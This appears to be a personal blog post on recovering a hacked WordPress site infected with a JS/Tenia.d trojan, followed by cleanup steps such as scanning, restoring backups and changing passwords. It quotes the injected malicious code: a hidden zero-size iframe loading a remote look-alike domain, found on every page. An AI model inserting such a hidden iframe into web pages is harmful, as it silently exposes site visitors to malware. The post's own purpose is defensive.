Alternate title: Oh my gosh! My Website’s been hacked!
What do I do now?

A reader recently left me a comment stating that when he brought my Web site up on his browser, his anti virus detected a trojan horse virus called JS/Tenia.d. I immediately started googling, trying to come up with instructions on what to do. Unfortunately, there was very little out there and I had to figure it out on my own. Please understand that it’s totally possible I went about ridding myself of this beast in a crazy backwards manner but it seems to have worked and so I share it with you. Here’s what I did:

1. I checked the page source of my home page and found a snippet of code under the closing html tag that looked suspicious:

<iframe src=”http://google-stat.com/tomi/?t=2″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

It turns out, this code was appended to the bottom of ALL my pages. Every single stinkin’ one.

2. I downloaded and installed the plugin: WordPress Exploit Scanner. This plugin searches and reports on all “text that is commonly used by spammers and hackers when a website is compromised.” It’s gonna spit out a long report… try not to get too discouraged. You are going to have to go through this report and see which files have been tampered with. And then you are going to either delete the file or cut out the malicious code. You have to be smart about this because you don’t want to cut out too much (such as the good code) and mistakenly take down your own Web site. Plus, there are quite a number of false positives so you are going to have to determine if it’s a real issue or not.

Now here’s the good news: The date/time stamp on the files will help you determine which files have been tampered with– I noticed all the bad files were tampered with on March 22 so I started looking for all files dated March 22.

The files that I ended up editing were index.php AND almost all the txt, xml, and html files within WordPress. Again, just look to see when they were last edited, that will give you a good idea of which files you need to touch. And I know there’s a lot of folders within folders within folders, use the Workpress Exploit scan report to point you to which folders you need to hunt through.

3. All my old non-Wordpress archives and all my WP-themes were appended with the lovely malicious code. There were far too many files for me to delete the code manually. After sobbing and wondering if I could hire someone to spend the next 5 weeks deleting the code I realized I could just have my hosting company restore a back up to a folder on the server. From there I just copied over the folders that contained my old archives and my themes. Now don’t get me wrong, this took quite awhile and my little ftp program was nearly out of breath by the end but at least I didn’t have to remove the code manually.

4. How this code even got on my Web site, I have no idea! Did my computer have the trojan horse on it and when I logged into my Web site the thing ran rampant? Did someone figure out my login and password? Was it a hole in my browser? Who knows. So just to be safe, I changed my passwords and I ran a thorough anti virus scan on my computer. (Surprise, Surprise, there were two trojans hiding on my computer!)

I hope this helps people figure out what to do and saves you some time. Just remember that the people responsible for hacks and spam and viruses will eventually have it come back and bite them. May mosquitoes fly into their noses and lay eggs in their sinus cavities.

To all you computer geeks out there, feel free to leave a comment if you have any other suggestions as to how this can be fixed or at least averted.